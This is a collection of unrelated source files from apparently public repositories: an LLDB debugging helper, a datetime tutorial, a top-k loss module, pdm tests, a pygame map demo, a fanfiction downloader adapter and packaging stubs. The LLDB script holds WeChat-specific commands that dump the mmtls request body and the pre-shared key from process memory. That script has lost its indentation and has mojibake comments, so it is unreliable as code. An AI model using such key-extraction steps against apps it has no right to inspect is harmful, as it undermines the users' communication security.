def dump_ext_registers(debugger, command, result, internal_dict):
interpreter = lldb.debugger.GetCommandInterpreter()
return_object = lldb.SBCommandReturnObject() # ็จๆฅไฟๅญ็ปๆ
text = ""
for i in range(0, 32):
interpreter.HandleCommand(f'register read q{i}', return_object)
output = return_object.GetOutput()
text += output.encode("unicode_escape").decode()
print("dump registers ext")
file_path = f"{base_save_path}/lldb_ext_registers.txt"
with open(file_path, "w") as f:
f.write(text)
print("save to:", file_path)
def dump_line(debugger, command, result, internal_dict):
interpreter = lldb.debugger.GetCommandInterpreter()
return_object = lldb.SBCommandReturnObject() # ็จๆฅไฟๅญ็ปๆ
interpreter.HandleCommand(f'disassemble -p -c 1', return_object)
output = return_object.GetOutput()
result = re.findall("unnamed_(symbol.+)\\$\\$[a-zA-z]+", output)
file_path = f"{base_save_path}/lldb_codes_{result[0]}.txt"
with open(file_path, "a") as f:
lines = output.split("\n")
f.write(lines[1].encode("unicode_escape").decode() + "\n")
debugger.HandleCommand("n")
def get_command_out(_command):
interpreter = lldb.debugger.GetCommandInterpreter()
return_object = lldb.SBCommandReturnObject()
interpreter.HandleCommand(_command, return_object)
return return_object.GetOutput().strip()
def read_ptr_value(addr):
output = get_command_out(f"memory read/gx {addr}")
return output.split(": ")[-1]
def read_register_value(r):
output = get_command_out(f"po/x {r}")
return output.split(": ")[-1]
def read_mem_from_ptr(debugger, command, result, internal_dict):
args = command.split(" ")
addr = args[0]
if len(args) > 1:
mem_size = args[1]
else:
mem_size = 64
output = read_ptr_value(addr)
_command = f"memory read -c {mem_size} {output}"
print("_command:", _command)
debugger.HandleCommand(_command)
def read_mem_by_easy(debugger, command, result, internal_dict):
args = command.split(" ")
addr = args[0]
if len(args) > 1:
mem_size = args[1]
else:
mem_size = 64
_command = f"memory read -c {mem_size} {addr}"
print("_command:", _command)
debugger.HandleCommand(_command)
##### ๅฎๅถๅๅค็้จๅ ###########
def wechat_test_for_mem(debugger, command, result, internal_dict):
# mmtls:Init 0x26D094 ไฝ็ฝฎๅค
x0 = read_register_value("$x19")
x19_value = int(x0, 16)
x19_0x60 = x19_value + 0x60
_ = read_ptr_value(x19_0x60)
print("read request body addr: (focus on +0x20)")
_command = f"memory read -c 64 {_}"
print(_command)
lldb.debugger.HandleCommand(_command)
print("\nread psk:")
# *(*(*(x19 + 0xb8) + 8) + 0x28)
_ = read_ptr_value(x19_value + 0xb8) #
print("_:", _, hex(x19_value))
_ = read_ptr_value(int(_, 16) + 8)
print("_:", _)
psk_addr = read_ptr_value(int(_, 16) + 0x28)
print("_:", psk_addr)
_command = f"memory read -c 0x94 {psk_addr}"
lldb.debugger.HandleCommand(_command)
def wechat_test_for_b0(debugger, command, result, internal_dict):
# mmtls::ClientChannel::WriteMsgToSendBuffer 0x26EF64 ไฝ็ฝฎๅค
x0 = read_register_value("$x0")
# *(*(*(x0 + 0x8 + 0x10) + 0x28) + 0x8)
_ = read_ptr_value(int(x0, 16) + 0x8 + 0x10)
_ = read_ptr_value(int(_, 16) + 0x28)
_ = read_ptr_value(int(_, 16) + 0x8)
_command = f"memory read -c 0x64 {_}"
print("_command:", _command)
lldb.debugger.HandleCommand(_command)
# command script import xxx/lldb_util.py
def __lldb_init_module(debugger, internal_dict):
# ๅฝ้็จๅ ่ฝฝ่ๆฌๆถไผ่ฐ็จ่ฏฅๆนๆณ
debugger.HandleCommand('command script add -f lldb_util.dump_function dumpF')
debugger.HandleCommand('command script add -f lldb_util.dump_mems dumpM')
debugger.HandleCommand('command script add -f lldb_util.dump_registers dumpR')
debugger.HandleCommand('command script add -f lldb_util.dump_ext_registers dumpR2')
debugger.HandleCommand('command script add -f lldb_util.dump_line dumpL')
debugger.HandleCommand('command script add -f lldb_util.read_mem_from_ptr readPtr')
debugger.HandleCommand('command script add -f lldb_util.read_mem_by_easy measy')
debugger.HandleCommand('command script add -f lldb_util.wechat_test_for_mem wechat_x19')
debugger.HandleCommand('command script add -f lldb_util.wechat_test_for_b0 wechat_b0')
| 35.994413 | 92 | 0.683998 |
ace8eb35e65e704dc42a6fb7dbb8c125b9d229b9 | 1,355 | py | Python | Curso/paquete/44_ManejoFechas_datatime.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/44_ManejoFechas_datatime.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | Curso/paquete/44_ManejoFechas_datatime.py | jsalmoralp/Python-Proyecto-Apuntes | cf4265e08e947aca1dbe9ec4ed1dfb7cb10e9309 | [
"MIT"
] | null | null | null | import datetime
# from datetime import datetime
fecha_actual = datetime.datetime.now()
# fechaActual = datetime.now() # Esto con el segudo import
print(fecha_actual)
fecha_premake = datetime.datetime(2020, 11, 5)
print(fecha_premake)
fecha_premake2 = datetime.datetime(2020, 11, 5, 10, 35, 21)
print(fecha_premake2)
fecha_personalizada = datetime.datetime.strftime(fecha_actual, '%d/%m/%Y %H:%M:%S')
print(fecha_personalizada)
fecha_personalizada2 = datetime.datetime.strftime(fecha_actual, '%b %d %Y %H:%M:%S')
print(fecha_personalizada2)
# https://strftime.org/
fecha_texto = 'Dec 06 2020 12:56:11'
fecha_a_formato_datetime = datetime.datetime.strptime(fecha_texto, '%b %d %Y %H:%M:%S')
print(fecha_a_formato_datetime)
dia = datetime.datetime.strftime(fecha_actual, '%d')
print(dia)
dia_en_int = int(datetime.datetime.strftime(fecha_actual, '%d'))
print(dia_en_int)
hora_actual = datetime.datetime.strftime(fecha_actual, '%H:%M:%S')
print(hora_actual)
fecha_pasada = datetime.datetime(2020, 10, 23)
diferencia = fecha_actual - fecha_pasada
print(diferencia)
print(diferencia.days)
print(diferencia.total_seconds())
dia_delta = datetime.timedelta(days=-5)
fecha_inicial = datetime.date.today()
print(fecha_inicial)
fechaFutura = fecha_inicial + dia_delta
print(fechaFutura)
fecha_iso = datetime.datetime.now().isoformat()
print(fecha_iso)
| 27.1 | 87 | 0.771218 |
ace8ec1a3bb80d245beae574fe3211e8f7edb1b7 | 3,979 | py | Python | topk/polynomial/sp.py | afansi/smooth-topk | d115b66f19489e2c8b572efabd6d947dc4e54a3c | [
"MIT"
] | null | null | null | topk/polynomial/sp.py | afansi/smooth-topk | d115b66f19489e2c8b572efabd6d947dc4e54a3c | [
"MIT"
] | null | null | null | topk/polynomial/sp.py | afansi/smooth-topk | d115b66f19489e2c8b572efabd6d947dc4e54a3c | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.autograd as ag
from topk.polynomial.divide_conquer import divide_and_conquer
from topk.polynomial.multiplication import Multiplication
from topk.polynomial.grad import d_logS_d_expX
class LogSumExp(nn.Module):
def __init__(self, k, p=None, thresh=1e-5):
super(LogSumExp, self).__init__()
self.k = k
self.p = int(1 + 0.2 * k) if p is None else p
self.thresh = thresh
self.mul = Multiplication(self.k + self.p - 1)
self.register_buffer('grad_k', torch.Tensor(0))
self.register_buffer('grad_km1', torch.Tensor(0))
def forward(self, x):
return LogSumExpNew_F.apply(
x, self.k, self.p, self.thresh, self.grad_km1, self.grad_k, self.mul
)
class LogSumExpNew_F(ag.Function):
@staticmethod
def forward(ctx, x, k, p, thresh, grad_km1, grad_k, mul):
"""
Returns a matrix of size (2, n_samples) with sigma_{k-1} and sigma_{k}
for each sample of the mini-batch.
"""
ctx.k = k
ctx.p = p
ctx.thresh = thresh
ctx.grad_km1 = grad_km1
ctx.grad_k = grad_k
ctx.save_for_backward(x)
# number of samples and number of coefficients to compute
n_s = x.size(0)
kp = k + p - 1
assert kp <= x.size(1)
# clone to allow in-place operations
x = x.clone()
# pre-compute normalization
x_summed = x.sum(1)
# invert in log-space
x.t_().mul_(-1)
# initialize polynomials (in log-space)
x = [x, x.clone().fill_(0)]
# polynomial multiplications
log_res = divide_and_conquer(x, kp, mul=mul)
# re-normalize
coeff = log_res + x_summed[None, :]
# avoid broadcasting issues (in particular if n_s = 1)
coeff = coeff.view(kp + 1, n_s)
# save all coeff for backward
ctx.saved_coeff = coeff
return coeff[k - 1: k + 1]
@staticmethod
def backward(ctx, grad_sk):
"""
Compute backward pass of LogSumExp.
Python variables with an upper case first letter are in
log-space, other are in standard space.
"""
# tensors from forward pass
X, = ctx.saved_tensors
S = ctx.saved_coeff
k = ctx.k
p = ctx.p
grad_km1 = ctx.grad_km1
grad_k = ctx.grad_k
thresh = ctx.thresh
# extend to shape (ctx.k + 1, n_samples, n_classes) for backward
S = S.unsqueeze(2).expand(S.size(0), X.size(0), X.size(1))
# compute gradients for coeff of degree k and k - 1
grad_km1 = d_logS_d_expX(S, X, k - 1, p, grad_km1, thresh)
grad_k = d_logS_d_expX(S, X, k, p, grad_k, thresh)
# chain rule: combine with incoming gradients (broadcast to all classes on third dim)
grad_x = grad_sk[0, :, None] * grad_km1 + grad_sk[1, :, None] * grad_k
ctx.grad_km1 = grad_km1
ctx.grad_k = grad_k
return grad_x, None, None, None, None, None, None
def log_sum_exp(x):
"""
Compute log(sum(exp(x), 1)) in a numerically stable way.
Assumes x is 2d.
"""
max_score, _ = x.max(1)
return max_score + torch.log(torch.sum(torch.exp(x - max_score[:, None]), 1))
def log_sum_exp_k_autograd(x, k):
# number of samples and number of coefficients to compute
n_s = x.size(0)
assert k <= x.size(1)
# clone to allow in-place operations
x = x.clone()
# pre-compute normalization
x_summed = x.sum(1)
# invert in log-space
x.t_().mul_(-1)
# initialize polynomials (in log-space)
x = [x, x.clone().fill_(0)]
# polynomial mulitplications
log_res = divide_and_conquer(x, k, mul=Multiplication(k))
# re-normalize
coeff = log_res + x_summed[None, :]
# avoid broadcasting issues (in particular if n_s = 1)
coeff = coeff.view(k + 1, n_s)
return coeff[k - 1: k + 1]
| 27.068027 | 93 | 0.597135 |
ace8ec943ff987d21fe4479f9bcf27bf5aab9d24 | 10,397 | py | Python | tests/cli/test_add.py | julie777/pdm | a6029ca02105d79da4841c701edf73f7315f74eb | [
"MIT"
] | 1 | 2022-03-02T19:43:46.000Z | 2022-03-02T19:43:46.000Z | tests/cli/test_add.py | julie777/pdm | a6029ca02105d79da4841c701edf73f7315f74eb | [
"MIT"
] | 1 | 2022-03-20T07:36:27.000Z | 2022-03-20T07:36:27.000Z | tests/cli/test_add.py | julie777/pdm | a6029ca02105d79da4841c701edf73f7315f74eb | [
"MIT"
] | null | null | null | import shutil
from pathlib import Path
import pytest
from pdm.cli import actions
from pdm.models.pip_shims import Link
from pdm.models.specifiers import PySpecSet
from tests import FIXTURES
@pytest.mark.usefixtures("repository")
def test_add_package(project, working_set, is_dev):
actions.do_add(project, is_dev, packages=["requests"])
group = (
project.tool_settings["dev-dependencies"]["dev"]
if is_dev
else project.meta["dependencies"]
)
assert group[0] == "requests~=2.19"
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["idna"].version == "2.7"
for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
assert package in working_set
def test_add_command(project, invoke, mocker):
do_add = mocker.patch.object(actions, "do_add")
invoke(["add", "requests"], obj=project)
do_add.assert_called_once()
@pytest.mark.usefixtures("repository")
def test_add_package_to_custom_group(project, working_set):
actions.do_add(project, group="test", packages=["requests"])
assert "requests" in project.meta.optional_dependencies["test"][0]
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["idna"].version == "2.7"
for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
assert package in working_set
@pytest.mark.usefixtures("repository")
def test_add_package_to_custom_dev_group(project, working_set):
actions.do_add(project, dev=True, group="test", packages=["requests"])
dependencies = project.tool_settings["dev-dependencies"]["test"]
assert "requests" in dependencies[0]
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["idna"].version == "2.7"
for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
assert package in working_set
@pytest.mark.usefixtures("repository", "vcs")
def test_add_editable_package(project, working_set, is_dev):
# Ensure that correct python version is used.
project.environment.python_requires = PySpecSet(">=3.6")
actions.do_add(project, is_dev, packages=["demo"])
actions.do_add(
project,
is_dev,
editables=["git+https://github.com/test-root/demo.git#egg=demo"],
)
group = (
project.tool_settings["dev-dependencies"]["dev"]
if is_dev
else project.meta["dependencies"]
)
assert "demo" in group[0]
assert "-e git+https://github.com/test-root/demo.git#egg=demo" in group[1]
locked_candidates = project.locked_repository.all_candidates
assert (
locked_candidates["demo"].prepare(project.environment).revision
== "1234567890abcdef"
)
assert locked_candidates["idna"].version == "2.7"
assert "idna" in working_set
actions.do_sync(project, no_editable=True)
assert not working_set["demo"].link_file
@pytest.mark.usefixtures("repository", "vcs")
def test_editable_package_override_non_editable(project, working_set):
project.environment.python_requires = PySpecSet(">=3.6")
actions.do_add(
project, packages=["git+https://github.com/test-root/demo.git#egg=demo"]
)
actions.do_add(
project,
editables=["git+https://github.com/test-root/demo.git#egg=demo"],
)
assert working_set["demo"].link_file
@pytest.mark.usefixtures("repository", "working_set")
def test_add_remote_package_url(project, is_dev):
project.environment.python_requires = PySpecSet(">=3.6")
actions.do_add(
project,
is_dev,
packages=["http://fixtures.test/artifacts/demo-0.0.1-py2.py3-none-any.whl"],
)
group = (
project.tool_settings["dev-dependencies"]["dev"]
if is_dev
else project.meta["dependencies"]
)
assert (
group[0]
== "demo @ http://fixtures.test/artifacts/demo-0.0.1-py2.py3-none-any.whl"
)
@pytest.mark.usefixtures("repository")
def test_add_no_install(project, working_set):
actions.do_add(project, sync=False, packages=["requests"])
for package in ("requests", "idna", "chardet", "urllib3", "certifi"):
assert package not in working_set
@pytest.mark.usefixtures("repository")
def test_add_package_save_exact(project):
actions.do_add(project, sync=False, save="exact", packages=["requests"])
assert project.meta.dependencies[0] == "requests==2.19.1"
@pytest.mark.usefixtures("repository")
def test_add_package_save_wildcard(project):
actions.do_add(project, sync=False, save="wildcard", packages=["requests"])
assert project.meta.dependencies[0] == "requests"
@pytest.mark.usefixtures("repository")
def test_add_package_save_minimum(project):
actions.do_add(project, sync=False, save="minimum", packages=["requests"])
assert project.meta.dependencies[0] == "requests>=2.19.1"
def test_add_package_update_reuse(project, repository):
actions.do_add(project, sync=False, save="wildcard", packages=["requests", "pytz"])
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["requests"].version == "2.19.1"
assert locked_candidates["chardet"].version == "3.0.4"
assert locked_candidates["pytz"].version == "2019.3"
repository.add_candidate("pytz", "2019.6")
repository.add_candidate("chardet", "3.0.5")
repository.add_candidate("requests", "2.20.0")
repository.add_dependencies(
"requests",
"2.20.0",
[
"certifi>=2017.4.17",
"chardet<3.1.0,>=3.0.2",
"idna<2.8,>=2.5",
"urllib3<1.24,>=1.21.1",
],
)
actions.do_add(
project, sync=False, save="wildcard", packages=["requests"], strategy="reuse"
)
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["requests"].version == "2.20.0"
assert locked_candidates["chardet"].version == "3.0.4"
assert locked_candidates["pytz"].version == "2019.3"
def test_add_package_update_eager(project, repository):
actions.do_add(project, sync=False, save="wildcard", packages=["requests", "pytz"])
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["requests"].version == "2.19.1"
assert locked_candidates["chardet"].version == "3.0.4"
assert locked_candidates["pytz"].version == "2019.3"
repository.add_candidate("pytz", "2019.6")
repository.add_candidate("chardet", "3.0.5")
repository.add_candidate("requests", "2.20.0")
repository.add_dependencies(
"requests",
"2.20.0",
[
"certifi>=2017.4.17",
"chardet<3.1.0,>=3.0.2",
"idna<2.8,>=2.5",
"urllib3<1.24,>=1.21.1",
],
)
actions.do_add(
project, sync=False, save="wildcard", packages=["requests"], strategy="eager"
)
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["requests"].version == "2.20.0"
assert locked_candidates["chardet"].version == "3.0.5"
assert locked_candidates["pytz"].version == "2019.3"
@pytest.mark.usefixtures("repository")
def test_add_package_with_mismatch_marker(project, working_set, mocker):
mocker.patch(
"pdm.models.environment.get_pep508_environment",
return_value={"platform_system": "Darwin"},
)
actions.do_add(project, packages=["requests", "pytz; platform_system!='Darwin'"])
assert "pytz" not in working_set
@pytest.mark.usefixtures("repository")
def test_add_dependency_from_multiple_parents(project, working_set, mocker):
mocker.patch(
"pdm.models.environment.get_pep508_environment",
return_value={"platform_system": "Darwin"},
)
actions.do_add(project, packages=["requests", "chardet; platform_system!='Darwin'"])
assert "chardet" in working_set
@pytest.mark.usefixtures("repository")
def test_add_packages_without_self(project, working_set):
project.environment.python_requires = PySpecSet(">=3.6")
actions.do_add(project, packages=["requests"], no_self=True)
assert project.meta.name not in working_set
@pytest.mark.usefixtures("repository", "working_set")
def test_add_package_unconstrained_rewrite_specifier(project):
project.environment.python_requires = PySpecSet(">=3.6")
actions.do_add(project, packages=["django"], no_self=True)
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["django"].version == "2.2.9"
assert project.meta.dependencies[0] == "django~=2.2"
actions.do_add(
project, packages=["django-toolbar"], no_self=True, unconstrained=True
)
locked_candidates = project.locked_repository.all_candidates
assert locked_candidates["django"].version == "1.11.8"
assert project.meta.dependencies[0] == "django~=1.11"
@pytest.mark.usefixtures("repository", "working_set", "vcs")
def test_add_cached_vcs_requirement(project, mocker):
project.environment.python_requires = PySpecSet(">=3.6")
url = "git+https://github.com/test-root/demo.git@1234567890abcdef#egg=demo"
built_path = FIXTURES / "artifacts/demo-0.0.1-py2.py3-none-any.whl"
wheel_cache = project.make_wheel_cache()
cache_path = Path(wheel_cache.get_path_for_link(Link(url)))
if not cache_path.exists():
cache_path.mkdir(parents=True)
shutil.copy2(built_path, cache_path)
downloader = mocker.patch("pdm.models.pip_shims.unpack_url")
builder = mocker.patch("pdm.builders.WheelBuilder.build")
actions.do_add(project, packages=[url], no_self=True)
lockfile_entry = next(p for p in project.lockfile["package"] if p["name"] == "demo")
assert lockfile_entry["revision"] == "1234567890abcdef"
downloader.assert_not_called()
builder.assert_not_called()
@pytest.mark.usefixtures("repository")
def test_add_with_dry_run(project, capsys):
actions.do_add(project, dry_run=True, packages=["requests"])
out, _ = capsys.readouterr()
assert not project.get_dependencies()
assert "requests 2.19.1" in out
assert "urllib3 1.22" in out
@pytest.mark.usefixtures("repository")
def test_add_with_prerelease(project, working_set):
actions.do_add(project, packages=["urllib3"], prerelease=True)
assert working_set["urllib3"].version == "1.23b0"
assert project.meta.dependencies[0] == "urllib3<2,>=1.23b0"
| 37.265233 | 88 | 0.697413 |
ace8eca1dd87624d63dbe8759de5ead3208e13b8 | 1,689 | py | Python | pygame_draw_state.py | sd16spring/us_map | 683290cf7838225a9323ef1c375ac3b535edca1b | [
"MIT"
] | null | null | null | pygame_draw_state.py | sd16spring/us_map | 683290cf7838225a9323ef1c375ac3b535edca1b | [
"MIT"
] | null | null | null | pygame_draw_state.py | sd16spring/us_map | 683290cf7838225a9323ef1c375ac3b535edca1b | [
"MIT"
] | null | null | null | """Sample code for `us_map.py`.
Author: Oliver Steele <oliver.steele@olin.edu>
License: MIT
Requirements:
sudo pip install BeautifulSoup
sudo pip install matplotlib
sudo pip install svg.path
"""
import pygame
import sys
import matplotlib.path
import us_map
# Colors
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
BLUE = (0, 0, 255)
GREEN = (0, 255, 0)
GRAY = (127, 127, 127)
LIGHT_GRAY = (191, 191, 191)
STATE = 'CO'
width, height = 640, 480
pygame.init()
screen = pygame.display.set_mode((width, height))
screen.fill(WHITE)
def point_in_polygon(pt, polygon):
"""Returns True iff `pt` is inside `polygon`.
`polygon` is a list of tuples `(x, y)`."""
return matplotlib.path.Path(polygon).contains_point(pt)
# Draw the polygons for the state.
for polygon in us_map.states[STATE]:
# `polygon` points are tuples `(float, float)`. PyGame requires `(int, int)`.
points = [(int(x), int(y)) for x, y in polygon]
# Draw the interior
pygame.draw.polygon(screen, BLUE, points)
# Draw the boundary
pygame.draw.polygon(screen, BLACK, points, 1)
pygame.display.flip()
last_mouse_in_state = False
while True:
if any(event.type == pygame.QUIT for event in pygame.event.get()):
sys.exit()
# Is the mouse inside the state?
mouse_in_state = any(point_in_polygon(pygame.mouse.get_pos(), polygon) for polygon in us_map.states[STATE])
# Only print a message if the mouse moved from the inside to the outside, or vice versa
if mouse_in_state != last_mouse_in_state:
last_mouse_in_state = mouse_in_state
if mouse_in_state:
print 'mouse in state'
else:
print 'mouse not in state'
| 25.208955 | 111 | 0.676732 |
ace8eca2038c34dcc8247d52cce452708f860fbd | 8,169 | py | Python | fanficfare/adapters/adapter_bloodshedversecom.py | smutandrea/FanFicFare | 56e91c1f73bd2444d7cf7adea9975b169692657d | [
"Apache-2.0"
] | 1 | 2020-08-27T03:49:02.000Z | 2020-08-27T03:49:02.000Z | fanficfare/adapters/adapter_bloodshedversecom.py | Hypernoc/FanFicFare | 869ed37137c82cd71ec589f36bc2001528d5e76c | [
"Apache-2.0"
] | null | null | null | fanficfare/adapters/adapter_bloodshedversecom.py | Hypernoc/FanFicFare | 869ed37137c82cd71ec589f36bc2001528d5e76c | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from datetime import timedelta
import re
import logging
logger = logging.getLogger(__name__)
from bs4 import BeautifulSoup
from ..htmlcleanup import stripHTML
# py2 vs py3 transition
from ..six import text_type as unicode
from ..six.moves.urllib import parse as urlparse
from ..six.moves.urllib.error import HTTPError
from .base_adapter import BaseSiteAdapter, makeDate
from .. import exceptions
def getClass():
return BloodshedverseComAdapter
def _get_query_data(url):
components = urlparse.urlparse(url)
query_data = urlparse.parse_qs(components.query)
return dict((key, data[0]) for key, data in query_data.items())
class BloodshedverseComAdapter(BaseSiteAdapter):
SITE_ABBREVIATION = 'bvc'
SITE_DOMAIN = 'bloodshedverse.com'
BASE_URL = 'https://' + SITE_DOMAIN + '/'
READ_URL_TEMPLATE = BASE_URL + 'stories.php?go=read&no=%s'
STARTED_DATETIME_FORMAT = '%m/%d/%Y'
UPDATED_DATETIME_FORMAT = '%m/%d/%Y %I:%M %p'
def __init__(self, config, url):
BaseSiteAdapter.__init__(self, config, url)
query_data = urlparse.parse_qs(self.parsedUrl.query)
story_no = query_data['no'][0]
self.story.setMetadata('storyId', story_no)
self._setURL(self.READ_URL_TEMPLATE % story_no)
self.story.setMetadata('siteabbrev', self.SITE_ABBREVIATION)
def _customized_fetch_url(self, url, exception=None, parameters=None):
if exception:
try:
data = self._fetchUrl(url, parameters)
except HTTPError:
raise exception(self.url)
# Just let self._fetchUrl throw the exception, don't catch and
# customize it.
else:
data = self._fetchUrl(url, parameters)
return self.make_soup(data)
@staticmethod
def getSiteDomain():
return BloodshedverseComAdapter.SITE_DOMAIN
@classmethod
def getSiteExampleURLs(cls):
return cls.READ_URL_TEMPLATE % 1234
def getSiteURLPattern(self):
return r'https?://' + re.escape(self.SITE_DOMAIN + '/stories.php?go=') + r'(read|chapters)\&(amp;)?no=\d+$'
# Override stripURLParameters so the "no" parameter won't get stripped
@classmethod
def stripURLParameters(cls, url):
return url
def extractChapterUrlsAndMetadata(self):
logger.debug("URL: "+self.url)
soup = self._customized_fetch_url(self.url)
# Since no 404 error code we have to raise the exception ourselves.
# A title that is just 'by' indicates that there is no author name
# and no story title available.
if stripHTML(soup.title) == 'by':
raise exceptions.StoryDoesNotExist(self.url)
for option in soup.find('select', {'name': 'chapter'}):
title = stripHTML(option)
url = self.READ_URL_TEMPLATE % option['value']
self.add_chapter(title, url)
# Reset the storyId to be the first chapter no. Needed
# because emails contain link to later chapters instead.
query_data = urlparse.parse_qs(self.get_chapter(0,'url'))
story_no = query_data['no'][0]
self.story.setMetadata('storyId', story_no)
self._setURL(self.READ_URL_TEMPLATE % story_no)
logger.info("updated storyId:%s"%story_no)
logger.info("updated storyUrl:%s"%self.url)
story_no = self.story.getMetadata('storyId')
# Get the URL to the author's page and find the correct story entry to
# scrape the metadata
author_url = urlparse.urljoin(self.url, soup.find('a', {'class': 'headline'})['href'])
soup = self._customized_fetch_url(author_url)
# Ignore first list_box div, it only contains the author information
for list_box in soup('div', {'class': 'list_box'})[1:]:
url = list_box.find('a', {'class': 'fictitle'})['href']
query_data = _get_query_data(url)
# Found the div containing the story's metadata; break the loop and
# parse the element
if query_data['no'] == story_no:
break
else:
raise exceptions.FailedToDownload(self.url)
title_anchor = list_box.find('a', {'class': 'fictitle'})
self.story.setMetadata('title', stripHTML(title_anchor))
author_anchor = title_anchor.findNextSibling('a')
self.story.setMetadata('author', stripHTML(author_anchor))
self.story.setMetadata('authorId', _get_query_data(author_anchor['href'])['who'])
self.story.setMetadata('authorUrl', urlparse.urljoin(self.url, author_anchor['href']))
list_review = list_box.find('div', {'class': 'list_review'})
reviews = stripHTML(list_review.a).split(' ', 1)[0]
self.story.setMetadata('reviews', reviews)
summary_div = list_box.find('div', {'class': 'list_summary'})
if not self.getConfig('keep_summary_html'):
summary = ''.join(summary_div(text=True))
else:
summary = self.utf8FromSoup(author_url, summary_div)
self.story.setMetadata('description', summary)
# I'm assuming this to be the category, not sure what else it could be
first_listinfo = list_box.find('div', {'class': 'list_info'})
self.story.addToList('category', stripHTML(first_listinfo.a))
for list_info in first_listinfo.findNextSiblings('div', {'class': 'list_info'}):
for b_tag in list_info('b'):
key = b_tag.string.strip(': ')
# Strip colons from the beginning, superfluous spaces and minus
# characters from the end, and possibly trailing commas from
# the warnings if only one is present
value = b_tag.nextSibling.string.strip(': -,')
if key == 'Genre':
for genre in value.split(', '):
# Ignore the "none" genre
if not genre == 'none':
self.story.addToList('genre', genre)
elif key == 'Rating':
self.story.setMetadata('rating', value)
elif key == 'Complete':
self.story.setMetadata('status', 'Completed' if value == 'Yes' else 'In-Progress')
elif key == 'Warning':
for warning in value.split(', '):
# The string here starts with ", " before the actual list
# of values sometimes, so check for an empty warning
# and ignore the "none" warning.
if not warning or warning == 'none':
continue
self.story.addToList('warnings', warning)
elif key == 'Chapters':
self.story.setMetadata('numChapters', int(value))
elif key == 'Words':
# Apparently only numChapters need to be an integer for
# some strange reason. Remove possible ',' characters as to
# not confuse the codebase down the line
self.story.setMetadata('numWords', value.replace(',', ''))
elif key == 'Started':
self.story.setMetadata('datePublished', makeDate(value, self.STARTED_DATETIME_FORMAT))
elif key == 'Updated':
date = makeDate(value, self.UPDATED_DATETIME_FORMAT)
# ugly %p(am/pm) hack moved into makeDate so other sites can use it.
self.story.setMetadata('dateUpdated', date)
if self.story.getMetadata('rating') == 'NC-17' and not (self.is_adult or self.getConfig('is_adult')):
raise exceptions.AdultCheckRequired(self.url)
def getChapterText(self, url):
soup = self._customized_fetch_url(url)
storytext_div = soup.find('div', {'class': 'storytext'})
if self.getConfig('strip_text_links'):
for anchor in storytext_div('a', {'class': 'FAtxtL'}):
anchor.replaceWith(anchor.string)
return self.utf8FromSoup(url, storytext_div)
| 39.84878 | 115 | 0.611948 |
ace8ed2b834e77636a17ad0ec1d29f39b10e5f67 | 103 | py | Python | uniseg/version.py | olivier-compilatio/uniseg-python | 8513a59e9c701a173c8001655e592c18f8840b16 | [
"MIT"
] | 2 | 2019-12-28T09:28:43.000Z | 2021-05-11T02:01:47.000Z | uniseg/version.py | olivier-compilatio/uniseg-python | 8513a59e9c701a173c8001655e592c18f8840b16 | [
"MIT"
] | null | null | null | uniseg/version.py | olivier-compilatio/uniseg-python | 8513a59e9c701a173c8001655e592c18f8840b16 | [
"MIT"
] | 2 | 2019-07-23T09:11:55.000Z | 2019-10-02T17:13:53.000Z | # NOTE: This file must not contain anything but the string literal of the
# software version!
'0.7.1'
| 25.75 | 74 | 0.737864 |
ace8ee8c4e1a508a65535615f261da5cab1935fa | 240 | py | Python | movo_common/movo_third_party/executive_smach_visualization/smach_viewer/setup.py | zkytony/kinova-movo | 37d7454b2dc589d44133f3913f567b9cc321a66d | [
"BSD-3-Clause"
] | 4 | 2021-01-23T18:35:43.000Z | 2021-12-26T09:03:53.000Z | movo_common/movo_third_party/executive_smach_visualization/smach_viewer/setup.py | ALAN-NUS/kinova_movo | 05a0451f5c563359ae0ffe3280e1df85caec9e55 | [
"BSD-3-Clause"
] | null | null | null | movo_common/movo_third_party/executive_smach_visualization/smach_viewer/setup.py | ALAN-NUS/kinova_movo | 05a0451f5c563359ae0ffe3280e1df85caec9e55 | [
"BSD-3-Clause"
] | 1 | 2020-01-21T11:05:24.000Z | 2020-01-21T11:05:24.000Z | #!/usr/bin/env python
from distutils.core import setup
from catkin_pkg.python_setup import generate_distutils_setup
d = generate_distutils_setup(
packages=['smach_viewer', 'smach_viewer.xdot'],
package_dir={'': 'src'}
)
setup(**d)
| 20 | 60 | 0.75 |
ace8eef7b4cd0f1607cfe12ec5e2515660e32dfe | 14,452 | py | Python | chives/harvester/harvester_api.py | zcomputerwiz/chives-light-wallet | b5f57f46bf4f804cc06a6e2bdf8cbde41bba2fe0 | [
"Apache-2.0"
] | null | null | null | chives/harvester/harvester_api.py | zcomputerwiz/chives-light-wallet | b5f57f46bf4f804cc06a6e2bdf8cbde41bba2fe0 | [
"Apache-2.0"
] | null | null | null | chives/harvester/harvester_api.py | zcomputerwiz/chives-light-wallet | b5f57f46bf4f804cc06a6e2bdf8cbde41bba2fe0 | [
"Apache-2.0"
] | 1 | 2022-03-20T16:19:04.000Z | 2022-03-20T16:19:04.000Z | import asyncio
import time
from pathlib import Path
from typing import Callable, List, Tuple
from blspy import AugSchemeMPL, G2Element, G1Element
from chives.consensus.pot_iterations import calculate_iterations_quality, calculate_sp_interval_iters
from chives.harvester.harvester import Harvester
from chives.plotting.util import PlotInfo, parse_plot_info
from chives.protocols import harvester_protocol
from chives.protocols.farmer_protocol import FarmingInfo
from chives.protocols.harvester_protocol import Plot
from chives.protocols.protocol_message_types import ProtocolMessageTypes
from chives.server.outbound_message import make_msg
from chives.server.ws_connection import WSChivesConnection
